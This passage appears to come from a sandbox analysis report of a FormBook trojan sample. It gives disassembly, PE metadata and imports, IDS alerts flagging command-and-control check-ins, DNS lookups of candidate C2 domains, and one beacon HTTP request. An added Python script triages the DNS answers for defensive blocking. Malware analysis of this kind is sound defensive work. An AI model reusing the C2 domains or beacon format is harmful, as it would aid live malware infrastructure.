                                                                          call 00007F819CA242B3h
                                                                          call 00007F819CA219E9h
                                                                          test eax, eax
                                                                          je 00007F819CA21BE2h
                                                                          mov edi, 007A9000h
                                                                          push edi
                                                                          call dword ptr [00407140h]
                                                                          call dword ptr [004070ACh]
                                                                          push eax
                                                                          push edi
                                                                          call 00007F819CA24271h
                                                                          push 00000000h
                                                                          call dword ptr [00407108h]
                                                                          cmp byte ptr [007A9000h], 00000022h
                                                                          mov dword ptr [007A2F80h], eax
                                                                          mov eax, edi
                                                                          jne 00007F819CA21AACh
                                                                          mov byte ptr [esp+10h], 00000022h
                                                                          mov eax, 00000001h

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                          Data Directories

                                                                          Name | Virtual Address | Virtual Size | Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7344 | 0xb4 | .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ac000 | 0x2e40f | .rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                          Sections

                                                                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                          .text | 0x1000 | 0x59de | 0x5a00 | False | 0.681293402778 | data | 6.5143386598 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                          .rdata | 0x7000 | 0x10f2 | 0x1200 | False | 0.430338541667 | data | 5.0554281206 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data | 0x9000 | 0x39a034 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                          .ndata | 0x3a4000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .rsrc | 0x3ac000 | 0x2e40f | 0x2e600 | False | 0.319470181941 | data | 5.38627533233 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          Name | RVA | Size | Type | Language | Country
                                                                          RT_ICON | 0x3ac310 | 0x6454 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
                                                                          RT_ICON | 0x3b2764 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
                                                                          RT_ICON | 0x3c2f8c | 0x94a8 | data | |
                                                                          RT_ICON | 0x3cc434 | 0x5488 | data | |
                                                                          RT_ICON | 0x3d18bc | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 1056964608 | |
                                                                          RT_ICON | 0x3d5ae4 | 0x25a8 | data | |
                                                                          RT_ICON | 0x3d808c | 0x10a8 | data | |
                                                                          RT_ICON | 0x3d9134 | 0x988 | data | |
                                                                          RT_ICON | 0x3d9abc | 0x468 | GLS_BINARY_LSB_FIRST | |
                                                                          RT_DIALOG | 0x3d9f24 | 0x100 | data | English | United States
                                                                          RT_DIALOG | 0x3da024 | 0x11c | data | English | United States
                                                                          RT_DIALOG | 0x3da140 | 0x60 | data | English | United States
                                                                          RT_GROUP_ICON | 0x3da1a0 | 0x84 | data | |
                                                                          RT_MANIFEST | 0x3da224 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                          Imports

                                                                          DLL | Import
                                                                          KERNEL32.dll | CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                          USER32.dll | ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                          GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                          SHELL32.dll | SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                          ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                          COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                          ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance
                                                                          VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                          Possible Origin

                                                                          Language of compilation system | Country where language is spoken
                                                                          English | United States

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                          04/12/21-10:02:21.841809 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:02:21.876757 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 84.17.52.126 | 192.168.2.6
                                                                          04/12/21-10:02:21.879024 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:02:21.913930 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 5.56.20.161 | 192.168.2.6
                                                                          04/12/21-10:02:21.914433 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:02:21.949945 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 91.206.52.152 | 192.168.2.6
                                                                          04/12/21-10:02:21.950838 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:02:25.466097 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:02:29.466391 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:02:33.469421 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:02:37.467082 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:02:41.467548 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:02:45.479333 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:02:49.467956 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:02:53.468390 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:02:57.468855 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:03:01.469861 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:03:05.494586 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:03:09.469715 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 13.107.4.50
                                                                          04/12/21-10:03:09.505883 | ICMP | 408 | ICMP Echo Reply | | | 13.107.4.50 | 192.168.2.6
                                                                          04/12/21-10:03:13.666887 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49689 | 23.227.38.74 | 192.168.2.6
                                                                          04/12/21-10:03:40.456929 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49695 | 34.102.136.180 | 192.168.2.6
                                                                          04/12/21-10:03:45.624225 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49697 | 80 | 192.168.2.6 | 34.102.136.180
                                                                          04/12/21-10:03:45.624225 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49697 | 80 | 192.168.2.6 | 34.102.136.180
                                                                          04/12/21-10:03:45.624225 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49697 | 80 | 192.168.2.6 | 34.102.136.180
                                                                          04/12/21-10:03:45.825259 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49697 | 34.102.136.180 | 192.168.2.6
                                                                          04/12/21-10:04:19.335301 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49708 | 34.102.136.180 | 192.168.2.6
                                                                          04/12/21-10:04:24.554411 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49709 | 104.21.37.16 | 192.168.2.6
                                                                          04/12/21-10:04:35.690279 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.6 | 172.67.210.123
                                                                          04/12/21-10:04:35.690279 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.6 | 172.67.210.123
                                                                          04/12/21-10:04:35.690279 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.6 | 172.67.210.123

                                                                          Network Port Distribution

                                                                          TCP Packets


                                                                          UDP Packets

                                                                          Apr 12, 2021 10:03:54.110476017 CEST53613468.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:03:56.760005951 CEST5177453192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:03:57.075501919 CEST53517748.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:02.909727097 CEST5602353192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:03.046571970 CEST53560238.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:08.279654980 CEST5838453192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:08.596414089 CEST53583848.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:10.429367065 CEST6026153192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:10.482471943 CEST53602618.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:11.601286888 CEST5606153192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:11.650017023 CEST53560618.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:13.640791893 CEST5833653192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:13.731574059 CEST53583368.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:14.152781963 CEST5378153192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:14.201318026 CEST53537818.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:18.927165985 CEST5406453192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:19.089031935 CEST53540648.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:24.346843004 CEST5281153192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:24.415144920 CEST53528118.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:28.072017908 CEST5529953192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:28.123445034 CEST53552998.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:28.984147072 CEST6374553192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:29.032845974 CEST53637458.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:29.563364029 CEST5005553192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:29.938306093 CEST53500558.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:35.553415060 CEST6137453192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:35.634313107 CEST53613748.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:37.001802921 CEST5033953192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:37.050525904 CEST53503398.8.8.8192.168.2.6
                                                                          Apr 12, 2021 10:04:38.864094973 CEST6330753192.168.2.68.8.8.8
                                                                          Apr 12, 2021 10:04:38.912774086 CEST53633078.8.8.8192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 12, 2021 10:03:13.364851952 CEST | 192.168.2.6 | 8.8.8.8 | 0x766 | Standard query (0) | www.recovatek.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:03:24.554897070 CEST | 192.168.2.6 | 8.8.8.8 | 0x758b | Standard query (0) | www.alliedcds.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:03:29.967403889 CEST | 192.168.2.6 | 8.8.8.8 | 0xb191 | Standard query (0) | www.th0rgramm.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:03:35.054384947 CEST | 192.168.2.6 | 8.8.8.8 | 0xdc2c | Standard query (0) | www.selectenergyservicestx.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:03:40.151796103 CEST | 192.168.2.6 | 8.8.8.8 | 0xdcfb | Standard query (0) | www.investmentpartners.limited | A (IP address) | IN (0x0001)
Apr 12, 2021 10:03:45.501652002 CEST | 192.168.2.6 | 8.8.8.8 | 0xc0da | Standard query (0) | www.stacksyspro.net | A (IP address) | IN (0x0001)
Apr 12, 2021 10:03:50.837245941 CEST | 192.168.2.6 | 8.8.8.8 | 0x9e13 | Standard query (0) | www.aksharnewtown.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:03:56.760005951 CEST | 192.168.2.6 | 8.8.8.8 | 0x1a9b | Standard query (0) | www.tonton-koubou.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:02.909727097 CEST | 192.168.2.6 | 8.8.8.8 | 0x4345 | Standard query (0) | www.formula-kuhni.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:08.279654980 CEST | 192.168.2.6 | 8.8.8.8 | 0x2b90 | Standard query (0) | www.rainbowsdepot.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:13.640791893 CEST | 192.168.2.6 | 8.8.8.8 | 0x53a6 | Standard query (0) | www.xn--ol-xia.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:18.927165985 CEST | 192.168.2.6 | 8.8.8.8 | 0xf4e5 | Standard query (0) | www.ugonget.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:24.346843004 CEST | 192.168.2.6 | 8.8.8.8 | 0x89b6 | Standard query (0) | www.jabberjawmobile.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:29.563364029 CEST | 192.168.2.6 | 8.8.8.8 | 0xf6b7 | Standard query (0) | www.yakudatsu-hikaku.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:35.553415060 CEST | 192.168.2.6 | 8.8.8.8 | 0xcd77 | Standard query (0) | www.stkify.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 12, 2021 10:03:13.450625896 CEST | 8.8.8.8 | 192.168.2.6 | 0x766 | No error (0) | www.recovatek.com | shops.myshopify.com | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:03:13.450625896 CEST | 8.8.8.8 | 192.168.2.6 | 0x766 | No error (0) | shops.myshopify.com | - | 23.227.38.74 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:03:24.641757011 CEST | 8.8.8.8 | 192.168.2.6 | 0x758b | No error (0) | www.alliedcds.com | alliedcds.com | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:03:24.641757011 CEST | 8.8.8.8 | 192.168.2.6 | 0x758b | No error (0) | alliedcds.com | - | 107.180.50.167 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:03:30.033349037 CEST | 8.8.8.8 | 192.168.2.6 | 0xb191 | Name error (3) | www.th0rgramm.com | none | none | A (IP address) | IN (0x0001)
Apr 12, 2021 10:03:35.141187906 CEST | 8.8.8.8 | 192.168.2.6 | 0xdc2c | Name error (3) | www.selectenergyservicestx.com | none | none | A (IP address) | IN (0x0001)
Apr 12, 2021 10:03:40.211898088 CEST | 8.8.8.8 | 192.168.2.6 | 0xdcfb | No error (0) | www.investmentpartners.limited | investmentpartners.limited | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:03:40.211898088 CEST | 8.8.8.8 | 192.168.2.6 | 0xdcfb | No error (0) | investmentpartners.limited | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:03:45.581566095 CEST | 8.8.8.8 | 192.168.2.6 | 0xc0da | No error (0) | www.stacksyspro.net | stacksyspro.net | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:03:45.581566095 CEST | 8.8.8.8 | 192.168.2.6 | 0xc0da | No error (0) | stacksyspro.net | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:03:51.403454065 CEST | 8.8.8.8 | 192.168.2.6 | 0x9e13 | No error (0) | www.aksharnewtown.com | aksharnewtown.com | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:03:51.403454065 CEST | 8.8.8.8 | 192.168.2.6 | 0x9e13 | No error (0) | aksharnewtown.com | - | 103.86.176.10 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:03:57.075501919 CEST | 8.8.8.8 | 192.168.2.6 | 0x1a9b | No error (0) | www.tonton-koubou.com | - | 163.44.185.226 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:03.046571970 CEST | 8.8.8.8 | 192.168.2.6 | 0x4345 | No error (0) | www.formula-kuhni.com | - | 91.236.136.12 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:08.596414089 CEST | 8.8.8.8 | 192.168.2.6 | 0x2b90 | Server failure (2) | www.rainbowsdepot.com | none | none | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:13.731574059 CEST | 8.8.8.8 | 192.168.2.6 | 0x53a6 | No error (0) | www.xn--ol-xia.com | - | 81.17.18.198 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:19.089031935 CEST | 8.8.8.8 | 192.168.2.6 | 0xf4e5 | No error (0) | www.ugonget.com | ugonget.com | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:04:19.089031935 CEST | 8.8.8.8 | 192.168.2.6 | 0xf4e5 | No error (0) | ugonget.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:24.415144920 CEST | 8.8.8.8 | 192.168.2.6 | 0x89b6 | No error (0) | www.jabberjawmobile.com | - | 104.21.37.16 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:24.415144920 CEST | 8.8.8.8 | 192.168.2.6 | 0x89b6 | No error (0) | www.jabberjawmobile.com | - | 172.67.202.107 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:29.938306093 CEST | 8.8.8.8 | 192.168.2.6 | 0xf6b7 | No error (0) | www.yakudatsu-hikaku.com | - | 118.27.95.215 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:35.634313107 CEST | 8.8.8.8 | 192.168.2.6 | 0xcd77 | No error (0) | www.stkify.com | - | 172.67.210.123 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:04:35.634313107 CEST | 8.8.8.8 | 192.168.2.6 | 0xcd77 | No error (0) | www.stkify.com | - | 104.21.16.88 | A (IP address) | IN (0x0001)
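The answer table is easier to act on once each queried name is collapsed through its CNAME chain and the resulting addresses are grouped: three candidate names (www.th0rgramm.com, www.selectenergyservicestx.com, www.rainbowsdepot.com) never resolved, and three others (www.investmentpartners.limited, www.stacksyspro.net, www.ugonget.com) all land on the same address, 34.102.136.180. The Python below is an added example, not part of the Joe Sandbox report; it embeds the queried names and the answer rows transcribed from the two tables above and performs that triage. QUERIED, ANSWERS, the RCODE labels and the triage() helper are the example's own constructions.

```python
"""Triage the DNS answers from a sandbox run of a FormBook sample.

Added example, not part of the Joe Sandbox report. Collapses each queried
name through its CNAME chain to the final A records, separates names that
never resolved, and reports addresses shared by several queried names.
"""
from collections import defaultdict

# Names from the report's DNS Queries table, in query order.
QUERIED = [
    "www.recovatek.com", "www.alliedcds.com", "www.th0rgramm.com",
    "www.selectenergyservicestx.com", "www.investmentpartners.limited",
    "www.stacksyspro.net", "www.aksharnewtown.com", "www.tonton-koubou.com",
    "www.formula-kuhni.com", "www.rainbowsdepot.com", "www.xn--ol-xia.com",
    "www.ugonget.com", "www.jabberjawmobile.com", "www.yakudatsu-hikaku.com",
    "www.stkify.com",
]

# Rows transcribed from the report's DNS Answers table as
# (name, reply code, cname, address); None where the column is empty or "none".
ANSWERS = [
    ("www.recovatek.com", 0, "shops.myshopify.com", None),
    ("shops.myshopify.com", 0, None, "23.227.38.74"),
    ("www.alliedcds.com", 0, "alliedcds.com", None),
    ("alliedcds.com", 0, None, "107.180.50.167"),
    ("www.th0rgramm.com", 3, None, None),
    ("www.selectenergyservicestx.com", 3, None, None),
    ("www.investmentpartners.limited", 0, "investmentpartners.limited", None),
    ("investmentpartners.limited", 0, None, "34.102.136.180"),
    ("www.stacksyspro.net", 0, "stacksyspro.net", None),
    ("stacksyspro.net", 0, None, "34.102.136.180"),
    ("www.aksharnewtown.com", 0, "aksharnewtown.com", None),
    ("aksharnewtown.com", 0, None, "103.86.176.10"),
    ("www.tonton-koubou.com", 0, None, "163.44.185.226"),
    ("www.formula-kuhni.com", 0, None, "91.236.136.12"),
    ("www.rainbowsdepot.com", 2, None, None),
    ("www.xn--ol-xia.com", 0, None, "81.17.18.198"),
    ("www.ugonget.com", 0, "ugonget.com", None),
    ("ugonget.com", 0, None, "34.102.136.180"),
    ("www.jabberjawmobile.com", 0, None, "104.21.37.16"),
    ("www.jabberjawmobile.com", 0, None, "172.67.202.107"),
    ("www.yakudatsu-hikaku.com", 0, None, "118.27.95.215"),
    ("www.stkify.com", 0, None, "172.67.210.123"),
    ("www.stkify.com", 0, None, "104.21.16.88"),
]

RCODE = {0: "NOERROR", 2: "SERVFAIL", 3: "NXDOMAIN"}


def build_maps(answers):
    """Index the answer rows: name -> cname, name -> {A addresses}, name -> rcode."""
    cnames, addrs, rcodes = {}, defaultdict(set), {}
    for name, rcode, cname, addr in answers:
        rcodes[name] = rcode
        if cname:
            cnames[name] = cname
        if addr:
            addrs[name].add(addr)
    return cnames, addrs, rcodes


def resolve(name, cnames, addrs, max_hops=8):
    """Follow CNAMEs from name and return the A addresses at the end of the
    chain. Hop-bounded and loop-checked so a hostile zone cannot spin this."""
    seen = set()
    while name in cnames and len(seen) < max_hops:
        seen.add(name)
        name = cnames[name]
        if name in seen:          # CNAME loop: treat as unresolved
            return set()
    return set(addrs.get(name, ()))


def triage(queried, answers):
    """Return (resolved name -> {ips}, failed name -> reason, ip -> {names} shared)."""
    cnames, addrs, rcodes = build_maps(answers)
    resolved, failed = {}, {}
    for name in queried:
        ips = resolve(name, cnames, addrs)
        if ips:
            resolved[name] = ips
        else:
            failed[name] = RCODE.get(rcodes.get(name), "NOANSWER")
    by_ip = defaultdict(set)
    for name, ips in resolved.items():
        for ip in ips:
            by_ip[ip].add(name)
    shared = {ip: names for ip, names in by_ip.items() if len(names) > 1}
    return resolved, failed, shared


if __name__ == "__main__":
    resolved, failed, shared = triage(QUERIED, ANSWERS)
    for name, ips in resolved.items():
        print(f"{name:35} -> {', '.join(sorted(ips))}")
    for name, why in failed.items():
        print(f"{name:35} -> {why}")
    for ip, names in shared.items():
        print(f"shared {ip}: {', '.join(sorted(names))}")
```

The shared-address list is the part worth a second look before blocking: an address that fronts several unrelated candidate names is more likely a parking or hosting front end than dedicated C2 infrastructure, and a block on it may have collateral effects that a block on the individual names would not.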

HTTP Request Dependency Graph

• www.recovatek.com
• www.alliedcds.com
• www.investmentpartners.limited
• www.stacksyspro.net
• www.aksharnewtown.com
• www.tonton-koubou.com
• www.formula-kuhni.com
• www.xn--ol-xia.com
• www.ugonget.com
• www.jabberjawmobile.com
• www.yakudatsu-hikaku.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49689 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 10:03:13.498548985 CEST | 116 | OUT | GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=fCmUcBRhMrUy3w+kl11B/xiypSW2fUD8cU7Pu3gqArK5c3pJn3j9k/DsIYu7GSRGk0uMV4XXlw== HTTP/1.1
Host: www.recovatek.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 10:03:13.666887045 CEST | 118 | IN | HTTP/1.1 403 Forbidden
                                                                          Date: Mon, 12 Apr 2021 08:03:13 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          X-Sorting-Hat-PodId: 159
                                                                          X-Sorting-Hat-ShopId: 46105591968
                                                                          X-Dc: gcp-us-central1
                                                                          X-Request-ID: 617efc6b-4c0c-427a-b865-bed9b6ff1703
                                                                          Set-Cookie: _shopify_fs=2021-04-12T08%3A03%3A13Z; Expires=Tue, 12-Apr-22 08:03:13 GMT; Domain=recovatek.com; Path=/; SameSite=Lax
                                                                          X-XSS-Protection: 1; mode=block
                                                                          X-Download-Options: noopen
                                                                          X-Content-Type-Options: nosniff
                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                          CF-Cache-Status: DYNAMIC
                                                                          cf-request-id: 0966b43bfd00002c0d67a45000000001
                                                                          Server: cloudflare
                                                                          CF-RAY: 63eaefd99e352c0d-FRA
                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
